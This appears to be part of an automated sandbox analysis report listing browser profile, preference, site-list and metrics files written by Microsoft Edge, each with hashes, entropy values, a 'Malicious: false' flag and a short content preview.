                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.792967001793833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfB87JiZ95ih/cI9URLl8Roto9MFVvlwh7e4IbONIeTC6XQS0qGqk+Z4uj+t:akZ+reiRUah96qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                                                  MD5:A16779BEC6AF57E5D4CE751AFAD1B49E
                                                                                                                                                                                                                                                                                                                  SHA1:1C4B0DA883C4D2EB38DBF930ED73ABF4FB440094
                                                                                                                                                                                                                                                                                                                  SHA-256:8C3AEE9E6C34C13B4E10C3FA95C6B64BEC02FF74BBD9F1CFF5270B7A74322200
                                                                                                                                                                                                                                                                                                                  SHA-512:45A9D99927D197BCC7CC0835608C3D816F0CF620BACB8C19C9BBF3007CF95E1EB3FEA4E7D02C79BC6933BA22FA7A896B0C0DC798868931ED83FA9947A3335730
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADe3jLf1K+YSZ+8aMuC2HVcEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACqc/jx06ma/YRHxzvl6kamXTpfwnmeMwDB4ezErvhBVAAAAAA
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8287
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.798556005937171
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:fsNAZ+FeiRUBh/ejfkYY6qRAq1k8SPxVLZ7VTiQ:fsNAyMh/k8YY6q3QxVNZTiQ
                                                                                                                                                                                                                                                                                                                  MD5:0BE289D81F78911584D43CA612754B63
                                                                                                                                                                                                                                                                                                                  SHA1:62C4851337F9629592E3C193E71429394FB80820
                                                                                                                                                                                                                                                                                                                  SHA-256:0159AA25F006B54C023A3345C3D972B3901CF3CBFCF78E5EBB31F29987B7B7AF
                                                                                                                                                                                                                                                                                                                  SHA-512:B515C90E87D2927F26A630B1E9D62A50B43DA60AD5B14769E27285858490360EA2A08473CC36DB1F7C30108FE4260580E1BDB92F6052D05AE72CE1208B8D3F97
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):24893
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.033904004176752
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:DMkbJrT8IeQc5ekRhMgoS88YiL5uTY3Jb:DMk1rT8H2kRC6FuTQ
                                                                                                                                                                                                                                                                                                                  MD5:4154FB91CEA9B56512091024BED44CB6
                                                                                                                                                                                                                                                                                                                  SHA1:E0A6442D010EA4686C0B5F037D5D00B48EBFE2FB
                                                                                                                                                                                                                                                                                                                  SHA-256:BBDE43707AAD74FC954A389D685E30E856915819D9F122776608F6372751B96E
                                                                                                                                                                                                                                                                                                                  SHA-512:15BAF26787247459E1CF33F2AFBE7AB0B81AC3C0D24A03598E400AD0445F7308C29C0B4766D5FCCFBE84477369FE6E0A1F34FBEDB7040D553208A5790BB609DA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380890357381288","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):22714
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.050228617099914
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:5tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhTfhMZ8YiT35ub/Y3jFd46:DMkbJrT8IeQc5d1RhMZ8YiL5uTY3Jb
                                                                                                                                                                                                                                                                                                                  MD5:F4AA64DAEC2C83F9F7D018A590DA2BE7
                                                                                                                                                                                                                                                                                                                  SHA1:DEF3B6169ABBA4108C3681005C971AE23920843E
                                                                                                                                                                                                                                                                                                                  SHA-256:DFC61AC6332ADDC4BA73D793F802BBED3A348B0FCF402FA001DD8AD56B7A769B
                                                                                                                                                                                                                                                                                                                  SHA-512:EA895EF7C80B8653DACB18379924337239180D838439449A710B706CCBC140BBB8EAC3EDEEF142617080BAFDF6CEFBA3912C2440956E29AEC58B6187C9DB97A8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380890357381288","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):8138
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.817005756319854
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:asNAZ+FeiRU9DQTlkY/6qRAq1k8SPxVLZ7VTiq:asNAywET2Y/6q3QxVNZTiq
                                                                                                                                                                                                                                                                                                                  MD5:F06041452BC9FEE0FB182B76D6823FFF
                                                                                                                                                                                                                                                                                                                  SHA1:FFEACB13F841582EAA7C937896FD81E79209DD0F
                                                                                                                                                                                                                                                                                                                  SHA-256:199F9177C55F36B7ECAA2C5912DA379CF414662787DA94183D1DF94784D810E0
                                                                                                                                                                                                                                                                                                                  SHA-512:5837D10758DF720531E024F1AC647D0348D41583BDF3C0FEF973C386292FD46EB601EB735EAFCD0BE71BE8D4E5C8F81E64556503085D26B77B4AF81D6120899C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8138
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.817005756319854
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:asNAZ+FeiRU9DQTlkY/6qRAq1k8SPxVLZ7VTiq:asNAywET2Y/6q3QxVNZTiq
                                                                                                                                                                                                                                                                                                                  MD5:F06041452BC9FEE0FB182B76D6823FFF
                                                                                                                                                                                                                                                                                                                  SHA1:FFEACB13F841582EAA7C937896FD81E79209DD0F
                                                                                                                                                                                                                                                                                                                  SHA-256:199F9177C55F36B7ECAA2C5912DA379CF414662787DA94183D1DF94784D810E0
                                                                                                                                                                                                                                                                                                                  SHA-512:5837D10758DF720531E024F1AC647D0348D41583BDF3C0FEF973C386292FD46EB601EB735EAFCD0BE71BE8D4E5C8F81E64556503085D26B77B4AF81D6120899C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):24842
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.034706334390502
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:DMkbJrT8IeQc5e1RhMgoS88YiL5uTY3Jb:DMk1rT8H21RC6FuTQ
                                                                                                                                                                                                                                                                                                                  MD5:D3312B24F5EF887919CA82C2E4060B48
                                                                                                                                                                                                                                                                                                                  SHA1:5BFB49A96B5421106D0959E2674F34313E1AAEBF
                                                                                                                                                                                                                                                                                                                  SHA-256:5C021DBA8C69DEFB98288242C498F55859B5CC4CDBC823420128E363AF654ACE
                                                                                                                                                                                                                                                                                                                  SHA-512:43FD5C1E7B7FE3CF492939DB1124FC5CFD1E10841FAAF87374B40B10392F53A519C3D11D315FBCBF0B5C8DD4792A7990F22DC087B9F81C4938B0561EA6BE7555
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380890357381288","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                                  MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                                  SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                                  SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                                  SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                                  MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                                  SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                                  SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                                  SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0393710177309081
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:2f01utmqvDDKX71JvyqlBqfr3nXgXXpOvXrgTh5gBV9tW8tyVn8y08Tcm2RGOdB:S0EtwSQqShmv3yV08T2RGOD
                                                                                                                                                                                                                                                                                                                  MD5:FC3A1027754895626C5C3B7EC9782095
                                                                                                                                                                                                                                                                                                                  SHA1:DA2BE86EC63BE73DCA6C3B1B6C9815AA9CA872A5
                                                                                                                                                                                                                                                                                                                  SHA-256:5CE28B1F7FE46CC6107F3EF8566DED8F7707D19566CC5ED5282443CABE0B2399
                                                                                                                                                                                                                                                                                                                  SHA-512:8C57F0D9113C7CB5FC4FAAB178BB4B8D6E6EB4DEF2B8B92A92D52408C8A0E06092E8C9D43D0B92880677F8045A1D0723D3750A493F4F5AEB08D4FA2DA5AD6E18
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@............... `...O..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".upshyv20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./........................<.....w..U7DD._.....W6L..].>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4343558626000844
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:7R0CMWX8AN93SDHYRqyBBRmccVkkqaHR:FvN9YrF
                                                                                                                                                                                                                                                                                                                  MD5:3694E3BD946828251ACCAA8F6A28C399
                                                                                                                                                                                                                                                                                                                  SHA1:586208F617946DF3995DC935DAD98E47B7887A60
                                                                                                                                                                                                                                                                                                                  SHA-256:D94B5685D44E7C04AF3AC8740840F77C2A53708951306D49CA54C25C6FF44E6A
                                                                                                                                                                                                                                                                                                                  SHA-512:33913A4F404CCB255A95616A3AF3D9F95D215275EB2BBF88A66F46506684F7760D657A33EF8A227B6ED42C8AA90417B0138ECE6D3B2A4E70C336F4D57325977A
                                                                                                                                                                                                                                                                                                                  Malicious:false
